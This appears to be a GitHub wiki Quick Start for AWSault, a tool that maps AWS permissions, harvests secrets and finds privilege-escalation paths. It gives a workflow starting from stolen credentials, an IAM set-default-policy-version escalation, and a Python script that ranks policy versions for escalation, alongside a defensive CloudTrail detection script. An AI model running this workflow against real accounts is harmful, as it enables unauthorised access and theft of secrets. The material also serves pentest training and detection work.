Quick Start - baeziy/AWSault GitHub Wiki

Quick Start

Prerequisites

  1. AWSault is installed
  2. AWS credentials are configured (see Credentials)

Your first scan

Surface scan (default)

awsault

This fires read-only API calls across 120+ AWS services and reports which ones your credentials can access. It takes 30-60 seconds depending on your connection. Read-only does not mean invisible: each of these List/Describe/Get calls is recorded by CloudTrail as a management event, so a surface scan leaves a clear footprint in the target account's logs.
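Because the scan is noisy, it helps to know what its footprint looks like from the defender's side. The following is an added example, not part of AWSault: it parses a CloudTrail log file body (the `{"Records": [...]}` shape CloudTrail delivers) and flags any access key whose read-only calls touched an unusually wide set of services within a short window, which is exactly the pattern a surface scan produces. The records are constructed sample data, not real CloudTrail output, and the thresholds (5 services, 60 seconds) are assumptions to tune per environment.

```python
"""Spot the CloudTrail footprint of a broad read-only API sweep (added example).

A surface scan issues read-only List/Describe/Get calls to many services within
a minute; CloudTrail records each as a management event with readOnly=true.
This rule flags any access key that touched >= min_services distinct
eventSource values inside any window_seconds-long window.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import json

# Constructed sample records (not real CloudTrail output), reduced to the fields
# the detection uses. AKIAEXAMPLE1 enumerates six services in 40 s and then
# makes one write call; AKIAEXAMPLE2 is ordinary activity spread over 30 minutes.
def _rec(time, source, name, key, read_only=True):
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "readOnly": read_only,
            "userIdentity": {"type": "IAMUser", "accessKeyId": key}}

SAMPLE_LOG = json.dumps({"Records": [
    _rec("2024-05-01T10:00:00Z", "sts.amazonaws.com", "GetCallerIdentity", "AKIAEXAMPLE1"),
    _rec("2024-05-01T10:00:05Z", "iam.amazonaws.com", "ListUsers", "AKIAEXAMPLE1"),
    _rec("2024-05-01T10:00:10Z", "s3.amazonaws.com", "ListBuckets", "AKIAEXAMPLE1"),
    _rec("2024-05-01T10:00:20Z", "ec2.amazonaws.com", "DescribeInstances", "AKIAEXAMPLE1"),
    _rec("2024-05-01T10:00:30Z", "lambda.amazonaws.com", "ListFunctions", "AKIAEXAMPLE1"),
    _rec("2024-05-01T10:00:40Z", "rds.amazonaws.com", "DescribeDBInstances", "AKIAEXAMPLE1"),
    _rec("2024-05-01T10:05:00Z", "iam.amazonaws.com", "SetDefaultPolicyVersion", "AKIAEXAMPLE1", False),
    _rec("2024-05-01T10:00:00Z", "sts.amazonaws.com", "GetCallerIdentity", "AKIAEXAMPLE2"),
    _rec("2024-05-01T10:30:00Z", "s3.amazonaws.com", "ListBuckets", "AKIAEXAMPLE2"),
]})


def load_records(text):
    """Parse a CloudTrail log file body: a JSON object with a 'Records' array."""
    return json.loads(text)["Records"]


def _event_time(record):
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def find_enumeration_bursts(records, min_services=5, window_seconds=60):
    """Return {accessKeyId: sorted eventSources} for keys whose read-only calls
    spanned at least min_services distinct services inside one sliding window."""
    by_key = defaultdict(list)
    for r in records:
        key = r.get("userIdentity", {}).get("accessKeyId")
        if not key or not r.get("readOnly", False):
            continue  # write calls deserve their own rule; this one is about enumeration
        by_key[key].append((_event_time(r), r["eventSource"]))

    bursts = {}
    window = timedelta(seconds=window_seconds)
    for key, events in by_key.items():
        events.sort()
        widest, lo = set(), 0
        for hi in range(len(events)):
            # shrink the window from the left until it spans <= window_seconds
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            seen = {src for _, src in events[lo:hi + 1]}
            if len(seen) > len(widest):
                widest = seen
        if len(widest) >= min_services:
            bursts[key] = sorted(widest)
    return bursts


if __name__ == "__main__":
    for key, services in find_enumeration_bursts(load_records(SAMPLE_LOG)).items():
        print(f"{key}: {len(services)} services enumerated -> {', '.join(services)}")
```

Run it on real CloudTrail files by replacing SAMPLE_LOG with the decompressed file contents; the `readOnly` filter keeps the rule focused on enumeration, and the sliding window is what separates a scanner from a slow, legitimate operator who happens to touch many services over a day.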

Surface scan with a specific profile

awsault --profile staging

Full assault

awsault --godeep

This runs all five phases:

  1. Surface scan (permission mapping)
  2. Deep enumeration (resource config pulling)
  3. Security audit (misconfiguration detection)
  4. Loot extraction (secret harvesting)
  5. Identity recon (privilege escalation path detection)

After the scan, you also get Suggested Next Steps with ready-to-copy AWS CLI commands for every service where you have access.

Full assault with HTML report

awsault --godeep --all-regions --output report.html

Scan specific services only

awsault --services iam,s3,ec2,lambda,rds

After scanning

Browse surface scan results

# what IAM permissions do you have?
awsault --show iam

# check multiple services
awsault --show iam,s3,lambda

# see everything
awsault --show all

Drill into specific data

# view the actual IAM users data
awsault --show iam --detail list_users

# view S3 buckets
awsault --show s3 --detail list_buckets

Browse deep scan data

After a --godeep scan, revisit the results anytime without rescanning:

# view identity, policies, roles, and privesc paths
awsault --recon

# view security audit findings
awsault --findings

# view extracted secrets and credentials
awsault --loot

# view everything at once
awsault --recon --findings --loot

Export without rescanning

# export last scan to different formats
awsault --output results.json
awsault --output results.csv
awsault --output results.html

What to look at first

After a --godeep scan, focus on:

  1. Privilege escalation paths — shown at the bottom of the recon output. These are your fastest route to higher access.
  2. Security findings — sorted by severity (CRITICAL first). Public S3 buckets, open security groups, admin policies.
  3. Loot — secrets from Secrets Manager, SSM parameters, Lambda env vars. Often contain database credentials or API keys.
  4. Assumable roles — if you can assume a role with more permissions, that's your lateral movement path.
  5. Suggested next steps — AWSault generates concrete aws CLI commands you can copy-paste.

Typical pentesting workflow

# step 1: quick recon with stolen creds
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
awsault

# step 2: full deep dive
awsault --godeep --output initial_recon.html

# step 3: check specific services of interest
awsault --show iam
awsault --show s3 --detail list_buckets

# step 3b: review deep data anytime
awsault --recon              # who am i, what can i do, how can i escalate
awsault --findings           # what's misconfigured
awsault --loot               # what secrets were found

# step 3c: read specific policy documents live from AWS
awsault --policy S3Access                 # read an inline or managed policy
awsault --policy S3Access,DbRead          # read multiple at once
awsault --policy S3Access --user admin    # read a policy on a different user
awsault --policy S3Access --role SomeRole # read an inline policy on a role
awsault --policy S3Access --version v2    # read a specific managed policy version
awsault --all-policies                    # dump every policy on current identity
awsault --all-policies --role BackendRole # trust policy + all attached policies on a role

# step 4: if privesc found, escalate and rescan
# (note the current default version first so you can restore it afterwards;
#  changing the default affects every principal the policy is attached to)
aws iam set-default-policy-version --policy-arn <arn> --version-id v2
awsault --godeep --output post_escalation.html
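Before running step 4 it is worth confirming that the non-default version really is broader than the active one: a managed policy keeps up to five versions, only the default is in force, and whichever version you make default applies to everything the policy is attached to. The following is an added example, not AWSault's own code: it takes version documents shaped like the output of `aws iam list-policy-versions` and `aws iam get-policy-version` (constructed sample data here, with a hypothetical policy ARN), ranks them by how many probe actions each one allows, and emits both the escalation command and the command that restores the original default. Resource constraints and Condition blocks are ignored, so the result is an upper bound on what a version grants.

```python
"""Rank managed policy versions before using iam:SetDefaultPolicyVersion (added example).

Each version dict mirrors what the AWS CLI returns: VersionId, IsDefaultVersion,
and Document (the decoded policy JSON). Matching follows IAM's rules for the
Action element only: case-insensitive glob patterns, explicit Deny wins.
Resource and Condition are not evaluated, so "grants" means "could grant".
"""
from fnmatch import fnmatch

# Constructed sample versions, not from a real account. v1 is the live default;
# v2 is an older, fully permissive version; v3 allows listing but denies all IAM.
SAMPLE_VERSIONS = [
    {"VersionId": "v1", "IsDefaultVersion": True, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
                       "Resource": ["arn:aws:s3:::example-bucket",
                                    "arn:aws:s3:::example-bucket/*"]}]}},
    {"VersionId": "v2", "IsDefaultVersion": False, "Document": {
        "Version": "2012-10-17",
        "Statement": {"Effect": "Allow", "Action": "*", "Resource": "*"}}},
    {"VersionId": "v3", "IsDefaultVersion": False, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "iam:List*", "Resource": "*"},
                      {"Effect": "Deny", "Action": "iam:*", "Resource": "*"}]}},
]

# Actions that matter for escalation or lateral movement; extend to taste.
PROBE_ACTIONS = ["iam:CreateAccessKey", "iam:ListUsers", "s3:GetObject",
                 "sts:AssumeRole", "lambda:UpdateFunctionCode"]


def _as_list(value):
    """IAM allows a bare string or a list for Statement, Action and Resource."""
    return value if isinstance(value, list) else [value]


def _patterns(document, effect):
    pats = set()
    for stmt in _as_list(document.get("Statement", [])):
        if stmt.get("Effect") == effect:
            pats.update(_as_list(stmt.get("Action", [])))
    return pats


def grants(document, action):
    """True if an Allow pattern matches `action` and no Deny pattern does."""
    action = action.lower()
    if any(fnmatch(action, p.lower()) for p in _patterns(document, "Deny")):
        return False
    return any(fnmatch(action, p.lower()) for p in _patterns(document, "Allow"))


def rank_versions(versions, probe_actions):
    """Score each version by the probe actions it grants, most permissive first."""
    scored = [{"VersionId": v["VersionId"], "IsDefaultVersion": v["IsDefaultVersion"],
               "grants": [a for a in probe_actions if grants(v["Document"], a)]}
              for v in versions]
    scored.sort(key=lambda s: (-len(s["grants"]), s["VersionId"]))
    return scored


def escalation_candidates(versions, probe_actions):
    """Non-default versions that grant strictly more probe actions than the default."""
    ranked = rank_versions(versions, probe_actions)
    default = next(s for s in ranked if s["IsDefaultVersion"])
    return [s for s in ranked
            if not s["IsDefaultVersion"] and len(s["grants"]) > len(default["grants"])]


def cli_plan(policy_arn, versions, target_version_id):
    """The escalation command and the command that puts the original default back."""
    current = next(v["VersionId"] for v in versions if v["IsDefaultVersion"])
    base = f"aws iam set-default-policy-version --policy-arn {policy_arn} --version-id"
    return [f"{base} {target_version_id}", f"{base} {current}"]


if __name__ == "__main__":
    arn = "arn:aws:iam::123456789012:policy/ExamplePolicy"  # hypothetical ARN
    for cand in escalation_candidates(SAMPLE_VERSIONS, PROBE_ACTIONS):
        print(f"{cand['VersionId']} grants {len(cand['grants'])}/{len(PROBE_ACTIONS)} probe actions")
        escalate, restore = cli_plan(arn, SAMPLE_VERSIONS, cand["VersionId"])
        print("  escalate:", escalate)
        print("  restore: ", restore)
```

Feed it the real version documents (for example via `awsault --policy <name> --version vN`, or `aws iam get-policy-version` per version) and run the restore command as soon as the post-escalation scan is done.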